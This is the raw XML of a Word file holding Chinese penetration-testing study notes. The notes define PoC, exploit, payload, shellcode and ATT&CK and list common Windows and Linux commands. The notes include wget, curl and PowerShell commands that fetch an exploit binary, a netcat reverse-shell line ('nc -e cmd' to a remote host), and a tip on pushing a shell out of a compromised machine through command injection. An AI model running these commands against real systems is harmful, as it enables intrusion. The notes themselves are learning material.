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A22F" w14:textId="1FA79420" w:rsidR="00EB16D7" w:rsidRPr="00CC2EB2" w:rsidRDefault="00CC2EB2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CC2EB2">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>名词解释：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA5561" w14:textId="3887EE57" w:rsidR="00CC2EB2" w:rsidRDefault="00CC2EB2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CC2EB2">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidR="00D5158E">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EB2">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>全称 Proof of Concept，中文 “概念验证”，常指一段漏洞证明的代码</w:t>
      </w:r>
      <w:r w:rsidR="00D5158E">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D5158E" w:rsidRPr="00D5158E">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使得能够确认这个漏洞是真实存在的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF42F7" w14:textId="5CF0EE00" w:rsidR="00553FB1" w:rsidRDefault="00553FB1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553FB1">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXP：全称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00553FB1">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’(漏洞利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)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553FB1">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞利用是指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58183C05" w14:textId="7C59259E" w:rsidR="00D5158E" w:rsidRDefault="00553FB1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553FB1">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload：中文 ' 有效载荷 '，指成功exploit之后，真正在目标系统执行的代码或指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00553FB1">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击载荷是我们期望目标系统在被渗透攻击之后去执行的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030516D0" w14:textId="4CC28DD7" w:rsidR="00BD49B6" w:rsidRDefault="00BD49B6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D49B6">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shellcod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD49B6">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是在渗透攻击时作为攻击载荷运行的一组机器指令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BD49B6">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Shellcode通常以汇编语言编写。在大多数情况下,目标系统执行了Shellcode这一组指令之后,才会提供一个命令行shell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BD49B6">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这也是 Shellcode名称的由来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FB5F7" w14:textId="4837ACC5" w:rsidR="007744BA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7744BA">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ATT&amp;CK( Adversarial Tactics, Techniques and Common Knowledge )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="007744BA">
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>即对抗战术、技术和常识，它是一个站在攻击者的视角来描述攻击中各阶段用到的技术的模型。常见的应用场景主要有网络红蓝对抗模拟、网络安全渗透测试、网络防御差距评估、网络威胁情报收集等。ATT&amp;CK框架可以理解为一个红队或者攻击者在攻击一个目标系统，他说用到的技术的路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEBE2FA" w14:textId="6B8CB7E7" w:rsidR="007744BA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常用命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10781574" w14:textId="61177378" w:rsidR="007744BA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W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:eastAsia="新宋体" w:hAnsi="新宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB5BFCC" w14:textId="297FED53" w:rsidR="007744BA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nslookup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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>地址侦测器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5300736D" w14:textId="0CA892B6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leanmg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垃圾整理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F2A23" w14:textId="392876E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inver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检查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Windows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版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408C0218" w14:textId="2780229F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stsc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远程桌面连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EED1596" w14:textId="534CD819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Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EF6FC2" w14:textId="31FF59C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hoami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显示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 xml:space="preserve"> Linux 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上当前已登录用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C22E707" w14:textId="19B15685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8B6C72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>df -h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用人类可读的输出显示磁盘使用情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4350F5D2" w14:textId="43EF8DDF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8B6C72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>uname -ar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显示运行中的内核版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58226D4A" w14:textId="43668D8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h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istory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显示用户在之前执行的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 xml:space="preserve"> bash </w:t>
      </w:r>
      <w:r w:rsidRPr="008B6C72">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>脚本历史记录，还有敲入的命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504F4037" w14:textId="0E8C80DB" w:rsidR="004629E0" w:rsidRDefault="004629E0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文件权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F37FF7D" w14:textId="02D73C8E" w:rsidR="004629E0" w:rsidRDefault="004629E0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防火墙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D471F10" w14:textId="7495E3EF" w:rsidR="002E70E6" w:rsidRDefault="002E70E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文件上传下载：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355641A9" w14:textId="64936089" w:rsidR="002E70E6" w:rsidRDefault="002E70E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L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上文件下载：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479197DD" w14:textId="377BC94F" w:rsidR="00830652" w:rsidRDefault="009F286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9F2866">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00B13102">
          <w:rPr>
            <w:color w:val="4D4D4D"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8080/ms10-051.exe -O exploit.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61590699" w14:textId="22E6B53E" w:rsidR="009F2866" w:rsidRDefault="009F286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9F2866">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00B13102">
          <w:rPr>
            <w:color w:val="4D4D4D"/>
          </w:rPr>
          <w:t>http://127.0.0.1:8080/ms10-051.exe -o exploit.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07C3C153" w14:textId="7EB85A8F" w:rsidR="00830652" w:rsidRDefault="0083065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 wp14:anchorId="017728C6" wp14:editId="03766B98">
            <wp:extent cx="5486400" cy="83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DB42" w14:textId="3B0ABEB1" w:rsidR="009F2866" w:rsidRDefault="009F286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windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上文件下载：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B44A51" w14:textId="33E305D4" w:rsidR="00B13102" w:rsidRDefault="009F2866" w:rsidP="00B13102">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F2866">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>powershell.exe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9F2866">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>-Command "Invoke-WebRequest -Uri</w:t>
      </w:r>
      <w:r w:rsidR="00B13102">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00B13102" w:rsidRPr="00B13102">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="4D4D4D"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://down.52pojie.cn/Logo/52pojie.jpg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B13102" w:rsidRPr="009F2866">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763673D" w14:textId="710A635C" w:rsidR="00830652" w:rsidRDefault="00830652" w:rsidP="00B13102">
      <w:pPr>
        <w:rPr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 wp14:anchorId="2A8EF3B8" wp14:editId="7758BFBB">
            <wp:extent cx="5486400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A2A7" w14:textId="1C4615ED" w:rsidR="00830652" w:rsidRDefault="00830652" w:rsidP="00B13102">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C3DCFE" w14:textId="24D89812" w:rsidR="0070459F" w:rsidRDefault="0070459F" w:rsidP="00B1310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内网和外网通信：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244E9E8B" w14:textId="70FEA762" w:rsidR="0070459F" w:rsidRDefault="0070459F" w:rsidP="00B13102">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070459F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="0070459F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> www.baidu.com 5566</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74684A04" w14:textId="35DF45DC" w:rsidR="00CF3F0F" w:rsidRDefault="00CF3F0F" w:rsidP="00B1310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windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>防火墙：入站严格，出站宽松</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5187E023" w14:textId="2D93680F" w:rsidR="00CF3F0F" w:rsidRDefault="00467662" w:rsidP="00B1310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实战：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264251EA" w14:textId="3FC1C51C" w:rsidR="009F2866" w:rsidRDefault="00F53990" w:rsidP="009F286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对于命令注入型漏洞，可以先通过命令在肉鸡上下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>netcat,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后把肉鸡上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>弹到物理机上的某个端口，同时在物理机上进行端口监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B389E8" w14:textId="77777777" w:rsidR="00F53990" w:rsidRDefault="00F53990" w:rsidP="009F2866">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC85A4E" w14:textId="770F8DCB" w:rsidR="007744BA" w:rsidRPr="00CC2EB2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</w:p>
    <w:sectPr w:rsidR="007744BA" w:rsidRPr="00CC2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E3"/>
    <w:rsid w:val="002D26E3"/>
    <w:rsid w:val="002E70E6"/>
    <w:rsid w:val="004629E0"/>
    <w:rsid w:val="00467662"/>
    <w:rsid w:val="00553FB1"/>
    <w:rsid w:val="0070459F"/>
    <w:rsid w:val="007744BA"/>
    <w:rsid w:val="00830652"/>
    <w:rsid w:val="008A6DFD"/>
    <w:rsid w:val="008B6C72"/>
    <w:rsid w:val="009F2866"/>
    <w:rsid w:val="00B13102"/>
    <w:rsid w:val="00B5550D"/>
    <w:rsid w:val="00BD49B6"/>
    <w:rsid w:val="00CC2EB2"/>
    <w:rsid w:val="00CF3F0F"/>
    <w:rsid w:val="00D5158E"/>
    <w:rsid w:val="00EB16D7"/>
    <w:rsid w:val="00F06861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EEE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FAB13C32-BECC-4F14-8288-DCCF1C1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wn.52pojie.cn/Logo/52pojie.jpg%20-OutFile%20exploit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7.0.0.1:8080/ms10-051.exe%20-o%20exploit.ex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80/ms10-051.exe%20-O%20exploit.e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2023-01-26T23:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-27T10:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>